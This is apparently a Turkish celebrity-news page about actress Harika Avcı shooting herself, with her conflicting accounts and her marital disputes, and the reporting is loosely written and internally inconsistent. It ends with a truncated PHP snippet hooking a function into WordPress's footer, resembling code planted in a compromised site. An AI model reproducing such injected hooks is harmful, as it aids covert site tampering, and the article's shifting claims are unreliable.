Harika Avcı Kendini Vurdu

Aktrisin sabaha yakın sinirleri bozulup ve ani karar vererek kendini vurdu.Türkiye’nin tanımış oyuncusu Harika Avcı kendini kasten vurduğunu söyledi.

İki kurşunla hastaneye yerleştirilen sanatçı bu olayı kendisinin işlediğini itiraf etti. Oyuncu kendini kasden vurduğunu, şimdiye kadar yaşadıklarına protesto ettiğini söyledi. Eşinin silahlarını vekile vermek istedi, ancak almadılar. Bu zaman oyuncunun sabaha yakın sinirleri bozulup ve ani karar vererek kendini vurup. Her ne kadar çoktan ayrı yaşaması, Harika Avcı eşini 2 kez boşanmak için eşini mahkemeye verdi. Fakat ayrılmadılar.

Oyuncu 2 ay önce kaldığı otelde bayılmış gösterip bulundu. Avcının kendisini vurduğu silahın 24 yaş küçük eski kocası İbrahim Öztürke ait olduğu ortaya çıkmıştı. İbrahim ise mahkemenin uzaklaştırma kararından sonra oyuncu ile görüşmediğini bildirerek cinayette elinin olmadığını bildirmişti.

2 kurşun yarası alan Avcı ise daha sonra açıklamasında “yanlışlıkla oldu” demişti. Harika Avcı  şarkıcı. “Yeşilçam” ın birçok filmlerinde oynadı. Onun birçok rolleri olmuştur.

Yaklaşık admin

Ben Harun Güçlü 1988 Trabzon akçaabat doğumluyum küçük yaşlarımdan beri araştırmacı ve bilgi paylaşımcı bir insandım, tek hedefim habercilikte doruğa ulaşmak

Ayrıca kontrol

Gaziantep’te Suriyeli bir çocuk 50 TL için öldürüldü

Gaziantep’te Cengiz P. isimli şahıs, Suriyeli olduğu öğrenilen 12 yaşındaki Fahri Ali’yi 50 TL için ...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

function burakk(){ echo ' } add_action("wp_footer",'burakk');